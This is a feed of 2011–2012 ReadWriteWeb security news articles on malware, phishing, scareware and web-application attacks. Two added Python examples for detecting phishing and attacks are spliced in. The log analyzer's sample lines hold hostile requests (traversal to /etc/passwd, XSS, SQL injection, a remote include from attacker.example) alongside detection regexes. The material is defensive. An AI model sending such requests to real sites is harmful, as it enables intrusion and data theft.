malware - ReadWriteWeb (http://www.readwriteweb.com/feeds/tag/malware). Copyright 2012 Richard MacManus, readwriteweb@gmail.com. Tue, 14 Feb 2012 12:45:00 -0800

Hotspot Shield Now Protects iOS Users from Browser Related Malware

We all know the relative truth that there is no such thing as malware that can strike iOS devices. Malware breeds in incestuous pits of the Internet, with botnets and spammers lurking around every URL or third-party app store. Oh, but never on your iPhone. Malware is as synonymous with the Internet as search, chat or porn. Yet, when browsing with your Mac or iDevice, there is still a fair likelihood that you will run into a malware-stricken site that could potentially do you harm.

AnchorFree, makers of the powerful Hotspot Shield application, are adding a new function to its offering today. When browsing the Web, Hotspot Shield will now alert users when a site they visit contains malware. It may seem a trivial update for the malware-invincible iOS, but there is more danger than meets the eye.

David Gorodyansky, founder and CEO of AnchorFree, recognizes that there is no known malware that affects iOS devices. That does not mean that a user could not have a password stolen while using mobile Safari or some other type of browser on an iPhone, iPad or iPod Touch. Hotspot Shield works through the browser to detect up to 3 million malware threats.

For those unfamiliar with Hotspot Shield, it is a service that can create a mobile virtual private network (VPN) from anywhere. The purpose of this is to encrypt a user's browser activity with an HTTPS connection. In many countries, Hotspot Shield is used to get around censorship laws and blocked websites. For instance, Hotspot Shield made a name for itself in 2011 by allowing users to access restricted sites during the uprisings associated with the Arab Spring.

"AnchorFree is not about protecting your device, it is about protecting your browsing," Gorodyansky told ReadWriteWeb. "We protect all of your traffic, and we do it through the cloud."

The free version of Hotspot Shield protects users from 1.5 million malware threats. Users of Hotspot Shield Elite and mobile app (which is free with a monthly service charge) receive protection against an additional 1.5 million threats. Those include malware sites, malware-infected sites riddled with Trojans, phishing sites looking for user passwords as well as content farms and spam. When a user visits one of these types of sites through the browser, Hotspot Shield will alert the user to the danger and direct them away from the page (or allow them to click through if they are insistent).

Hotspot Shield has 10 million monthly users and is available on iPhone, iPad, iPod Touch or a PC. Gorodyansky said that the next launch set for AnchorFree will be to branch into the world of Android.

AnchorFree recognizes that there are many ways a user can come to harm on the Internet. Mobile malware is not just something found in third-party app stores or from time to time in the Android Market. The fundamental basis of smartphones is that they are devices that can access the Web. The beauty and power of the Web is that it knows few restrictions. AnchorFree not only wants to allow users to break through those restrictions, but also to protect them against the inevitable dangers that are inherent in that freedom.

http://www.readwriteweb.com/archives/hotspot_shield_now_protects_ios_users_from_browser.php Security Thu, 19 Jan 2012 08:00:00 -0800 Dan Rowinski
Hackers Steal 45,000 Facebook Passwords & Logins

A rampant worm by the name of Ramnit has stolen login and password information for 45,000 Facebook users, mostly in the UK and France. Prowling the 800-million-strong social network, the worm eats user names, passwords and browser cookies. It also acts as a backdoor, meaning a hacker can attack any computer that has already been infected. According to the Microsoft Malware Protection Center, Ramnit infects Windows executables, Microsoft Office and HTML files. The Ramnit worm initially transformed into financial malware in August 2011, according to reports from Trusteer.

"What was once malware designed to steal data from financial institutions has evolved into a social network threat," says John Weinschenk, CEO at cybersecurity company Cenzic. "Bank account numbers and Facebook log-in credentials seem very different, but to hackers, they are equally as lucrative."

The current composite Ramnit worm is like a Mogwai that has been hit with water, eaten food after midnight, stepped out into the sun and transformed into a hyper-evil gremlin.

Once Ramnit joined forces with the leaked ZeuS source-code in May, the Seculert blog says it became a "Hybrid creature." That is, it took on ZeuS' financial-data investigative nature and gained access to financial institutions. As a result, it compromised online banking sessions and also attacked a few corporate networks. The Ramnit worm burrows through Facebook, spreading malware to the walls of thousands of innocent Facebook users.

"To combat these types of threats, consumers need to be vigilant about changing passwords often," says Weinschenk. "Avoid clicking on unknown links, and alert their friends to a potential malicious link they might have posted."

Facebook spam attacks like this are nothing new. A recent attack that was caused by a browser vulnerability filled users' walls with photos of the Biebs in compromising sexual situations. Not long after, football-loving spammers nailed the Facebook community forum.


Users should keep an eye on their Facebook profiles as social network worms continue spreading.

Facebook says it blocks 200 million malicious actions per day, which include messages that send users to malware. Even still, Facebook spam is growing faster than its user base.

http://www.readwriteweb.com/archives/hackers_steal_45000_facebook_passwords_logins.php Facebook Thu, 05 Jan 2012 14:00:00 -0800 Alicia Eler
Phishing Attack Aimed to Obtain Apple Users Credit Card Information

A phishing attack aimed at new Mac users was launched the week after Christmas looking to obtain the credit card information of people signing up for a new Apple ID. The well-timed attack tries to redirect users signing up for an Apple ID to a phishing site designed to look like the Apple sign-in page, asking users to update their account information.

Security firm Intego found the attack and posted the information on its company blog. The phishing email comes from applied@id.apple.com. This should give users their first pause, as all Apple emails come from the @apple.com domain. The next red flag is that the URL users are redirected to is not on apple.com at all, but goes to a numbered IP address.

(Screenshot of the phishing URL. Source: Intego)

The sign-in page asks for users' profile information, including the credit card information that is tied to an Apple ID account.

One of the first rules users should be aware of when checking for malware and spam in email is to hover over a suspicious URL to see where the link they are about to click actually points. Telltale signs of phishing, malware and malicious sites are when the URL does not appear to be headed to an official page from the company in question.
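As an added example (not code from the ReadWriteWeb story or from Intego's post), the checks described above written as a small Python function: it flags a sender outside the expected domain, a link whose real target is a bare IP address or is not under the official domain (which also catches lookalike hosts such as apple.com.example.net, a case the story does not discuss), and a mismatch between a link's visible text and where it actually goes. The sample message, the 192.0.2.10 address and the lookalike host are constructed for illustration; only the sender address comes from the story.

```python
"""Detection of the phishing red flags described in the Intego/Apple ID story.

Constructed example: the message, the 192.0.2.10 address and the lookalike
host below are illustrative, not taken from the real campaign.
"""
import ipaddress
import re
from email.utils import parseaddr
from urllib.parse import urlparse

# Exact domain(s) a legitimate message is expected to be sent from.
EXPECTED_SENDER_DOMAINS = {"apple.com"}
# Registrable domain(s) an official account link should live under.
OFFICIAL_DOMAINS = {"apple.com"}

# Link text that itself looks like a URL or hostname: the "hover" check
# compares what the user sees against where the link really goes.
_URLISH = re.compile(r"(?:https?://)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?:[:/?#]\S*)?")


def host_of(url: str) -> str:
    """Hostname of a URL (lower-cased), or '' if it cannot be parsed."""
    if "://" not in url:
        url = "http://" + url
    try:
        return (urlparse(url).hostname or "").lower()
    except ValueError:
        return ""


def is_ip_literal(host: str) -> bool:
    """True if the host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def under_official_domain(host: str) -> bool:
    """True only if host is an official domain or a true subdomain of one.

    'apple.com.example.net' is neither equal to 'apple.com' nor ends with
    '.apple.com', so a lookalike host is rejected."""
    host = host.rstrip(".")
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)


def phishing_indicators(sender: str, link_text: str, link_href: str) -> list:
    """Return human-readable red flags for one message; [] means none found.

    The sender check is the weakest of the three: a From header costs
    nothing to forge, so the link checks carry most of the weight."""
    flags = []

    _, addr = parseaddr(sender)
    sender_domain = addr.rpartition("@")[2].lower()
    if sender_domain not in EXPECTED_SENDER_DOMAINS:
        flags.append(f"sender domain '{sender_domain}' is not an expected "
                     f"sender domain {sorted(EXPECTED_SENDER_DOMAINS)}")

    href_host = host_of(link_href)
    if is_ip_literal(href_host):
        flags.append(f"link target is a bare IP address ({href_host}), "
                     "not a named host")
    elif not under_official_domain(href_host):
        flags.append(f"link host '{href_host}' is not under an official domain")

    if _URLISH.fullmatch(link_text.strip()):
        text_host = host_of(link_text.strip())
        if text_host and text_host != href_host:
            flags.append(f"link text shows '{text_host}' but the link "
                         f"actually goes to '{href_host}'")
    return flags


if __name__ == "__main__":
    # Constructed message modelled on the story: sender outside apple.com,
    # visible link text that looks official, real target a numbered IP.
    for flag in phishing_indicators(
        "Apple <applied@id.apple.com>",
        "https://appleid.apple.com/account",
        "http://192.0.2.10/apple/update.php",
    ):
        print("RED FLAG:", flag)
```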

(Screenshot of the phishing email)

The phishers behind this attack have likely been sitting on it a while, waiting for when users received new Apple products during the holiday season. Malware makers are very sensitive when it comes to the timing of attacks. Zero day hacks are often stockpiled and unleashed when the impact will be optimal. Other malware and spam attacks are saved up for big news stories, such as what was seen during the Japan earthquake in 2011 or the death of Osama bin Laden. Spammers will then hit search engines with poisoned results and attempt to fill email inboxes with links to malicious sites. While the phishing attack aimed at Apple users was not a zero day attack, it is an example of phishers knowing when the best times are to launch an offensive.

Did you encounter an email similar to this last week? What other phishing attempts have been made against your inbox recently? Let us know in the comments.

http://www.readwriteweb.com/archives/phishing_attack_aimed_to_obtain_apple_users_credit.php Apple Mon, 02 Jan 2012 06:50:00 -0800 Dan Rowinski
BitDefender Protects Your Twitter Account With Safego

BitDefender announced its Twitter malware protection service Safego is now an open beta and users can sign up here for the free service. It is similar to the service that they have had for Facebook that we last wrote about here. Once you authorize it to use your Twitter account, it begins to process all your tweets, DMs and embedded links to see what is going on.

(Screenshot: snippet of the Safego dashboard)

As you can see from a snippet of its dashboard, you are informed about friends who haven't used their accounts in some time (they could be spammers, or it could just be a false positive and someone who has grown disenchanted with tweeting); any links that point to nasty places on the Net; other obvious threats that are detected; and other warnings. You can set it up to warn you weekly, to let your friends know that their accounts have been compromised (I would suggest not doing that for the moment, until the tool is further developed), and to scan your private messages. It will take several minutes to process your entire Twitter stream, depending on how many followers and messages you have.

It certainly can't hurt to have someone of BitDefender's caliber looking over your shoulder at your Tweets, and it can help in some cases to have this form of protection. And it is free.

http://www.readwriteweb.com/archives/bitdefender_protects_your_twitter_account_with_saf.php Analysis Thu, 15 Sep 2011 12:15:00 -0800 David Strom
Companies Need to Take A More Sophisticated Approach to Layered Security

Last week, leading security company McAfee asked a question of the security industry: "are we really protecting our users?" A lot of evidence points to the contrary. As can be seen in a new mid-year threat report from firewall maker SonicWall, consumer and corporate networks are larger and more vulnerable than ever. Yet, the battle against malicious programmers is not lost. It is a matter of common sense and evolution in security practices that will help protect companies and users from those that would do them harm.

"The days of just buying an anti-virus or a firewall program and just putting it on a PC are over," said SonicWall's VP of corporate development Ed Cohen. Enterprises and small and medium businesses need a more layered approach to security. Yet, the layers need to be more sophisticated. With the growing complexity of corporate networks, a new approach is needed.

"It is not just about blocking ports anymore," Cohen said. "It is monitoring and securing the network from the application and endpoint level as well."

SonicWall's report cites the growing problem of securing networks from social applications and mobile devices. These are new problems within the last several years that corporate networks have not yet caught up with. Cohen uses the example of Facebook, which has become a necessity for enterprises. Yet, monitoring when, where and how employees use Facebook or other similar applications is necessary for enterprise security. For instance, a business's marketing department needs to use Facebook, but it should not be allowed to use applications within the platform, like MafiaWars.

There is also the growing ubiquity of mobile devices and workers accessing the corporate network. That includes workers accessing work data from their smartphones or remote workers tapping in from unsecured connections.

"The more access that companies give, the more vulnerable they are," Cohen said. "Yet, at the end of the day, access and productivity often trump security."

Cohen advises that consumers, corporations and small to medium businesses become more proactive with security. That includes more monitoring of how and when users are accessing their work data, installing sophisticated anti-virus programs, next-generation firewalls and filters that scan for spyware, spam, Web vulnerabilities etc.

"It always surprises me when a small business says that it has an anti-virus program but asks why it also needs to get a firewall," Cohen said.

Cohen has four recommendations to effectively secure a business network.

  • Protect the network - That classic fortress approach where firewalls, black lists and security programs monitor the network itself.
  • Protect the endpoints - This includes securing computers making remote connections to the network, from using Secure Sockets Layer (SSL) and virtual private networks to making sure that every smartphone, tablet or computer that can access work data has an anti-virus client.
  • Back up data - This is an old standby credo of the security profession (or anybody that has ever used a computer), but Cohen says individuals and companies often do not do a good job of backing up data. There are a variety of new products and services that can help companies automatically back up their data in case of crash or breach.
  • Use managed service providers - This is a trend in enterprise that has grown in the last several years, especially when it comes to mobile devices. If you do not know how or cannot effectively manage your network, hire somebody else to help you do it.

SonicWall has an interesting quiz about detecting phishing attempts that it says most people fail miserably. Head on over and take the quiz and let us know how you did. It is a lot harder to detect phishing than even sophisticated users think (this reporter got six out of 10 correct and apparently that is a good score).

Here is a sample of the quiz. Is this phishing or legit?

(Image: sample question from the SonicWall phishing quiz)

Answer: Phishing

http://www.readwriteweb.com/archives/companies_need_to_take_a_more_sophisticated_approa.php Security Mon, 29 Aug 2011 07:15:00 -0800 Dan Rowinski
McAfee to Security Industry: "Are We Really Protecting Users and Companies?"

Security company McAfee released its second quarter threat report today and the language in it is quite frank: "The security industry may need to reconsider some of its fundamental assumptions, including 'Are we really protecting users and companies?'" With malware at its highest levels ever, the escapades of LulzSec and Anonymous continuing unhindered and new varieties of spam being created almost every minute, it is a pertinent question.

Android is now far and away the leader in mobile malware. For-profit mobile malware has also grown significantly, with SMS-sending Trojans and other complex Trojans compromising smartphones. Rootkit malware that takes over the operating system kernel of a computer or a smartphone is also becoming popular among malicious programmers. As McAfee notes, "The second quarter of the year was clearly a period of chaos, changes and new challenges."

(Chart: McAfee Q2 2011 threat report, mobile malware)

Android mobile malware has become a persistent threat. Earlier in the year the press covered every new iteration of Android malware, starting with DroidDream and jumping every time a smartphone sneezed. Now, just as with PC malware, Android malware is a usual occurrence. Some of the top Android malware Trojans and viruses out there are derivatives of DroidDream. That makes a lot of sense, as malware is known to morph significantly when it is out in the wild as new programmers get their hands on it and change it to their specific needs (or just enough to slip through security applications). Security programmers should look out for Android malware in the DroidKungFu family, the DrdDreamLite family and Tcent, which sends text messages to premium services.

As for traditional email spam, the price for a block of email addresses is relatively cheap. In Russia, the United States, Germany and Australia, 1 million email addresses will run you $25; upwards of 8 million addresses will cost about $200. As with legitimate software companies, malware programmers license their tools. Eleonore, a long-time tool for malicious programming, now goes for $2,000 for the latest version.

For the first half of 2011, malware is at its highest rate ever. Though, if you just take the second quarter into account, it is a touch behind the pace of 2010. Overall this year malware is up 22%. McAfee's library of malware will reach 75 million entries by the end of the year.

(Chart: McAfee Q2 2011 threat report, malware by month)

One of the most common targets has been Adobe, which now outpaces Microsoft in attracting exploits. That is another knock to Adobe, which has been struggling in the market to create new products that actually run effectively on computers and mobile devices.

McAfee's report covers a sprawl of different types of malware, spam, phishing and social engineering, mobile viruses and malware, and botnets. Reading through the report, it is no wonder that the security companies should be beginning to question themselves and whether or not they can keep up with the flood of malicious activity on the Internet. On one hand, the popular refrain is always "exercise common sense and you will be secure", but motivated hackers have almost no trouble isolating people and companies if they really want to get their information.

The question has to be asked: Is the security industry failing us?

http://www.readwriteweb.com/archives/mcafee_to_security_industry_are_we_really_protecti.php Security Tue, 23 Aug 2011 06:36:00 -0800 Dan Rowinski
Report: Fake Anti-Virus "Scareware" Programs on the Decline

One of the most insidious ways that malware scammers infect users' computers is through fake anti-virus programs. For years Internet denizens have seen pop-ups in their browsers claiming that "your computer is infected, click here to get rid of this virus." If users clicked, they would download a virus that the scammers would offer to eradicate, for a fee. This was a favorite practice of "Spam King" Sanford Wallace in the early 2000s. In recent months, the Federal Bureau of Investigation has raided the "scareware" spammers and as such, fake anti-virus malware on the Web has decreased by 60% in the last several months.

You may recognize the programs. They go by names like "Vista Security 2012," "XP Antispyware 2012" and "Mac Defender." Yet, according to Enigma Software, these scareware programs are on the decline. In June, the FBI raided malicious programmers in 12 countries including the U.S. and arrested ChronoPay's CEO Pavel Vrublevsky, whose Russian payments company was believed to be behind many of the applications.

Enigma Software has seen a "drastic drop in scan logs from new users, support logs, detections and support tickets from new customers" amounting to the 60% drop in fake anti-virus and scareware programs.

(Chart: Enigma Software, decline in scareware detections)

Enigma does not make mention of Mac Defender, but the malicious program was one of the first widespread Trojans to target Apple computers. Apple moved quickly to fix the problem with a series of security updates earlier this year. Apple is not known to issue weekly patches, but the existence of this type of malware application may force it in the future to be more proactive about security.

The way the FBI raids effectively cut down on scareware programs was to go after their payments systems.

"The FBI raids cut off the ability for the scareware makers and distributors to get paid and when they can't get paid by their victims, they shrivel up and go away," Enigma wrote.

Enigma is prudent in saying that, while the instances of these programs are down, it is likely a temporary cycle in the war against malware.

"Sadly, cybercriminals and scareware makers are smart. They're very good at what they do. And we have no doubt that sometime soon, they'll be back. They'll figure out another way to get their scareware out and to get paid by their victims. We expect that another cyber gang is going to step in and fill that void," the company wrote.

Image Sources: Enigma Software

http://www.readwriteweb.com/archives/report_fake_anti-virus_scareware_programs_on_the_d.php Security Fri, 19 Aug 2011 13:30:00 -0800 Dan Rowinski
Researcher Slams Sophos: How Secure Is Your Security Company?

The cyber security industry talks a big game. There is a certain amount of truth to the notion that security companies' marketing departments play up viruses or Trojans or known vulnerabilities to alert the public to their products. Security is a $16 billion industry and hyper-competitive. Yet, with all the news of exploits, big hacks and viruses in the news, one has to ask: are the security companies really doing their jobs?

That is up for debate. A Google security researcher (acting independently of Google) named Tavis Ormandy reverse engineered part of security firm Sophos's security products and published his research (PDF). He presented his findings at the Black Hat security conference in Las Vegas yesterday and had some hearty criticism not just for Sophos, but for the security industry in general. The issue, in part, is about how open security companies are with the codes and algorithms they use to protect users' computers. How open do security companies need to be to have the most effective product?


Kerckhoffs's Principle

Ormandy starts the abstract of his paper with a fairly simple declaration:

"Antivirus vendors often assert they must be protected from scrutiny and criticism, claiming that public understanding of their work would assist bad actors. However, it is the opinion of the author that Kerckhoffs's principle applies to all security systems, not just cryptosystems. Therefore, if close inspection of a security product weakens it, then the product is flawed."

The notion is that security companies hide their algorithms, codes and practices so that the bad actors will not be able to study them and easily sidestep them. Kerckhoffs's principle (from 19th century cryptographer Auguste Kerckhoffs) states: "A cryptosystem should be secure even if everything about the system, except the key, is public knowledge."

What Ormandy did with Sophos was pick apart a couple different subsections of the overall security product, including parts of Sophos's cryptology and obfuscation practices that it uses to protect data. Specifically, Ormandy looked at Sophos's buffer overflow protection, signature matching and cryptography (SPMAA, proprietary to Sophos) and its "genes and genotypes" product that detects the behavior of malicious programs.

Only A Piece Of The Puzzle

Sophos researcher and blogger Graham Cluley said that Ormandy is not an ordinary security engineer or computer user.

"No doubt he is a very bright chap," Cluley said in a call to ReadWriteWeb. "I think he comes at this problem from a very unusual angle. I imagine he is the type of fellow who analyzes every piece of code that he puts on his computer ... That is not something that scales. Tavis's mom could not do that."

Yet, Cluley notes that while what Ormandy did was helpful and informative for Sophos, it was only a piece of the company's larger security product. Cluley notes that Ormandy did not actually test the product against malware and that if he did he would have found that it is quite capable of blocking malicious programs.

Yet, Ormandy does have some pertinent points and Sophos is right to acknowledge them. The security vs. cyber-criminal battle is a two-step, a dance where one actor tries to take a step ahead of the other. If a hacker has specific knowledge of how the company detects malware and encrypts data, they have the advantage. A Sophos researcher who attended Ormandy's talk downplays that aspect.

"Malware writers have to be very generic in terms of what they write," Sophos researcher Vanja Svajcer said, according to Forbes. "They don't have time to investigate forty or fifty vendors to circumvent their products."

In general, that is true. Malware writers are interested in the richest targets available with the lowest barrier to success. Yet, that does not preclude any specific hacker from studying the weaknesses of a particular security product and finding ways around it. Spear phishing, attacks designed to exploit specific targets (nominally through some type of social engineering like email), is on the rise, and as we have seen with the attacks against Sony, Booz Allen Hamilton and the state of Arizona by LulzSec and Anonymous, dedicated attacks can be successful. As much as the security industry likes to tout its own products (which are effective for the most part), they are not perfect. Part of what Ormandy is doing with Sophos is pointing that out. At the same time, even the best security products cannot protect against employees not following best practices and poorly instituted security policies, which is often the case in large-scale hacks, such as Sony or HBGary.

Not Cluley v. Ormandy: Round 2

Cluley wanted to point out that Ormandy's latest criticism of Sophos products was not another case of "Ormandy v. Cluley." Last year Ormandy published zero-day vulnerabilities in Microsoft's code that led to attacks. Cluley slammed Ormandy for not giving the security industry or Microsoft enough time to respond to the vulnerability. Cluley says that is not the case this time around.

"This is not some Ormandy v. Cluley feud," Cluley said. "One of the things about this is that Tavis and Sophos have been working really closely together. It has been a friendly and open process."

Cluley responded to Ormandy's findings in a blog post at Naked Security stating that the cryptography algorithm that Ormandy found to be "weak" was being phased out and that the company is working to fix the other vulnerabilities in the next version of its product.

Yes, You Can Trust Your Security Companies

Yet, the question remains: can the security companies be trusted? In short, yes. For the most part, security products are an effective way to detect and eliminate malware. Some products are better than others. That does not excuse the industry from, at times, creating hype or fear (as an industry, not specifically Sophos) in reference to certain exploits. It is decent business sense - scare people into buying your product. Cluley says that the security companies have been guilty of that in the past and he hopes the industry is more responsible recently.

"I think industry has gotten better and more responsible. The thing that fascinates me is that you are stuck between a rock and a hard place," Cluley said. "You want people to wake up and stop clicking on naked pictures of Angelina Jolie. Still, we have to get the message out there."

http://www.readwriteweb.com/archives/researcher_slams_sophos_how_secure_is_your_securit.php Security Fri, 05 Aug 2011 09:00:00 -0800 Dan Rowinski
Google Releases 2-Step Verification in 40 Languages

In February, Google announced a new security protocol for Google account holders by way of "2-step verification." Essentially, 2-step verification is a layer of protection outside of the normal password layer of protection between the wild Web and your data, such as Gmail. The ingenuity of 2-step verification is that it effectively blunts automated password-breaking attacks from the Internet.

Google announced today that this extra net of protection will be available to the rest of the world as 2-step verification is being released in 40 languages across the globe. This has a potential to be a boon for the security industry and Google account holders across the world that are perpetually under attack from malware and phishing attacks attempting to access sensitive information.

It is very difficult to hack Google. The search giant sees advanced persistent threats (APTs) every hour of every day. Those hacks come from major botnets or even (allegedly) foreign governments like China. Yet, news that a real breach has happened through Google Apps or Gmail is rare.

Yet, that is just Google and its data centers. Individual users are more susceptible to phishing and malware attacks, especially as they become more targeted. That is where 2-step verification is a critical layer to protect sensitive information. Think about the attack on Booz Allen Hamilton that leaked 90,000 Department of Defense oriented emails several weeks ago by Anonymous. The hacktivist group bragged that it was easy to crack Booz Allen Hamilton, apparently through one particular unprotected server. Once they were in, they could not be stopped. The server was dumped and Anonymous had all the information it needed to make Booz Allen Hamilton look extremely foolish.

Likely, this would not have happened if Booz Allen Hamilton had the type of protection that is provided by the major public cloud operators like Google or even Microsoft's Azure. Yet, the private cloud or data center that Booz Allen Hamilton used was not sufficient to keep the hackers out.

While Google's 2-step verification initiative is an interesting function in how it protects Google accounts, it should be looked towards as a guideline to be built upon, especially when adding security in the enterprise or a government agency. Making security layered and universal between the public and enterprise is the first step to eliminating the botnets that cause so much headache on the Internet. Rolling out 2-step verification to 40 languages should only be a step toward making it a global standard.

http://www.readwriteweb.com/archives/google_releases_2-step_verification_in_40_lanugage.php Google Thu, 28 Jul 2011 10:26:26 -0800 Dan Rowinski
Where Does Your Malware Come From? [Infographic]

Where does your malware come from? How does it get to your computer? It is not like there is some magical, malicious stork that comes and drops off some demented baby into your operating system that makes it join a botnet at knife point. There is no stork, there is no baby.

Blue Coat security released an infographic this morning that makes it easy to understand how your computer is becoming infected with malware and what botnets are delivering it. For instance, did you know that "image search is the most dangerous activity users can engage in on the web"? Or that Shnakule is the biggest malware network out there currently with an average of 2,001 unique hosts a day? Hit the jump for the full infographic.

In terms of attack vectors, search engine poisoning is by far the most prevalent form of malware delivery on the Web. Email is the next biggest at 6.9%, with porn and social networking close behind at 6.7% and 5.2% respectively.

Expect that to change in coming years as social networking spam becomes more prevalent. At the same time, do not think that porn malware is going anywhere. Porn is huge on the web, a rabbit hole that is only getting deeper.

Check out the infographic for full details.

[Image: BlueCoat_Infographic.jpg]

http://www.readwriteweb.com/archives/where_does_your_malware_come_from_infographic.php Security Thu, 28 Jul 2011 08:15:00 -0800 Dan Rowinski
Report: Web Applications Attacked Every 2 Minutes

Data security company Imperva released research today that says Web applications are probed or attacked 27 times an hour, or once every two minutes. At the peak of attacks, some Web applications see probes or attacks 25,000 times an hour, or seven times per second. The research gives concrete numbers to what security researchers, governments and enterprises have known for a while - their networks are persistently under attack.

When researchers look for malware and attack vectors, the tendency is to look for vulnerabilities in portals or code. Yet, most of the major data breaches in recent news have been the result of attacks on Web apps such as email and data systems. The goal for hackers is to break applications with automated attacks that search for vulnerabilities until the apps crack and spill data straight into the hands of the attackers.

Imperva saw three distinct trends while observing Web app attacks from Dec. 2010 to May 2011: the attacks use four distinct strategies, they are automated and they originate in the United States.

Imperva says that 61% of attacks originate from botnets in the U.S. Yet, that does not mean that those doing the actual attacking are located in the U.S. When botnet controllers are looking to hit a specific target, they want to use computers closest to their bounty. What the attacks coming from the U.S. show is that a lot of Americans' computers are infected with malware and are thus part of some botnet. For instance, if hackers want to attack the U.S. government, the command-and-control center of the botnet might activate the 1,000 computers closest to Washington, D.C. About 10% of attacks originated from China, with Sweden and France also large contributors. China makes sense for its raw number of hackers, while Sweden has some of the most universal and robust broadband in the world.

[Image: Imperva_Attack_Origins.jpg]

The large number of attacks stems from botnet automation. Imperva said that it sees patterns where applications are attacked with heavy bursts of many thousands of attacks per hour followed by lighter periods of activity. In essence, the criminal hackers are looking to break the application quickly by testing a lot of known vulnerabilities. If it doesn't crack, their eyes turn elsewhere (criminal hackers are notorious for looking for easy targets). They automate the attacks before coming back for another look.

While Imperva was not specifically monitoring the Lulz Security attacks at their peak in June, it noted that they were very similar to what its research had turned up. A "hack" is an esoteric term. As far as the general public knows, the attacks were some complicated computer stuff that led to data being stolen. Yet, security researchers see four common types of attacks, what Imperva calls "the unfab four": directory traversal, cross-site scripting, SQL injection and remote file inclusion (RFI). These attacks come in two waves: scan and exploit. An attacker may use directory traversal and cross-site scripting during a scan phase and then hit the application with SQL injection or RFI in the exploit phase.

[Image: Imperva_UnFab4.jpg]

Overall, Imperva's findings are a great illumination of Advanced Persistent Threat (APT). The company recommends that agencies and corporations become familiar with how to deter automated attacks and perform their own "scans" to detect known vulnerabilities. If companies stay on top of their security weaknesses and communicate with the security community, APT attacks can be withstood and ultimately turned against the criminals perpetrating them.
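The two patterns Imperva describes, the four request categories and the burst-then-lull rhythm of automated probing, are both things a defender can pull out of ordinary web server logs. The following is an added example, not Imperva's code or ruleset: it classifies each request in a few constructed Common Log Format lines by the "unfab four" category and phase, then flags a source that fires several attack requests inside a short window. The regular expressions, the window size, the threshold and the sample log lines are all illustrative assumptions, not a production WAF signature set.

```python
"""Classify web requests by Imperva's "unfab four" and flag automated bursts.
Added example with constructed log lines; the patterns are illustrative
heuristics, not a production WAF ruleset."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format) for this example.
# 10.0.0.5 plays an automated scanner; 192.168.1.7 is an ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jul/2011:12:00:01 -0800] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512
10.0.0.5 - - [25/Jul/2011:12:00:02 -0800] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 120
10.0.0.5 - - [25/Jul/2011:12:00:03 -0800] "GET /product?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 33
10.0.0.5 - - [25/Jul/2011:12:00:04 -0800] "GET /include.php?file=http://attacker.example/shell.txt HTTP/1.1" 404 10
10.0.0.5 - - [25/Jul/2011:12:00:05 -0800] "GET /login?user=admin%27-- HTTP/1.1" 200 99
192.168.1.7 - - [25/Jul/2011:12:00:09 -0800] "GET /about.html HTTP/1.1" 200 2048
192.168.1.7 - - [25/Jul/2011:12:30:00 -0800] "GET /contact.html HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+')

# (category, phase, pattern) applied to the percent-decoded request target.
# Phases follow the article: traversal/XSS in the scan wave, SQLi/RFI in the exploit wave.
RULES = [
    ("directory_traversal", "scan", re.compile(r"\.\./|\.\.\\")),
    ("xss", "scan", re.compile(r"<script|javascript:|onerror=", re.I)),
    ("rfi", "exploit", re.compile(r"=(https?|ftp)://", re.I)),
    ("sqli", "exploit", re.compile(r"('|\")\s*(or|and)\s*('|\")?\d|'--|union\s+select", re.I)),
]


def classify(target):
    """Return (category, phase) for a request target, or (None, None) if benign-looking."""
    decoded = unquote(unquote(target))  # two passes so double-encoding does not hide the payload
    for category, phase, rx in RULES:
        if rx.search(decoded):
            return category, phase
    return None, None


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": when, "method": method, "target": target, "status": int(status)}


def analyze(log_text, burst_window_s=10, burst_threshold=3):
    """Per source IP: count of attack requests, categories/phases seen, and
    whether burst_threshold attack requests fell inside any burst_window_s window."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    per_ip = defaultdict(list)
    for e in events:
        e["category"], e["phase"] = classify(e["target"])
        per_ip[e["ip"]].append(e)

    report = {}
    for ip, evs in per_ip.items():
        hits = sorted((e for e in evs if e["category"]), key=lambda e: e["time"])
        # Sliding window over attack timestamps: largest count within burst_window_s.
        max_in_window, j = 0, 0
        for i in range(len(hits)):
            while (hits[i]["time"] - hits[j]["time"]).total_seconds() > burst_window_s:
                j += 1
            max_in_window = max(max_in_window, i - j + 1)
        report[ip] = {
            "attack_requests": len(hits),
            "categories": sorted({e["category"] for e in hits}),
            "phases": sorted({e["phase"] for e in hits}),
            "burst": max_in_window >= burst_threshold,
        }
    return report


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

Running it on the constructed log marks 10.0.0.5 with all four categories, both phases and a burst, while the ordinary visitor is left alone. Keyword matching like this is noisy on real traffic (a blog post quoting `<script>` is not an attack), so in practice the burst signal and the mix of scan-phase and exploit-phase requests from one source carry more weight than any single pattern hit.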

http://www.readwriteweb.com/archives/report_web_applications_attacked_every_2_minutes.php Security Mon, 25 Jul 2011 12:11:00 -0800 Dan Rowinski
Security App Aims to Keep Malware From Spreading Through iOS Devices It seems that every other week there are reports about new malware targeting Android devices through the Android Market. To date, no viruses, rootkits or Trojans have managed to worm through the Apple App Store onto user devices. That doesn't mean that iOS devices cannot be conduits for malware.

VirusBarrier is designed to scan attachments in users' email through the cloud to determine whether they carry malware that could harm a user's computer. Security company Intego designed the app to keep malware from spreading from mobile devices to computers, where it could do more harm than if it were couched in the kernel of an iPhone. VirusBarrier is one of the first malware scanners designed for iOS devices. How big a problem is malware spreading from mobile devices to computers? Is an app like VirusBarrier even necessary?

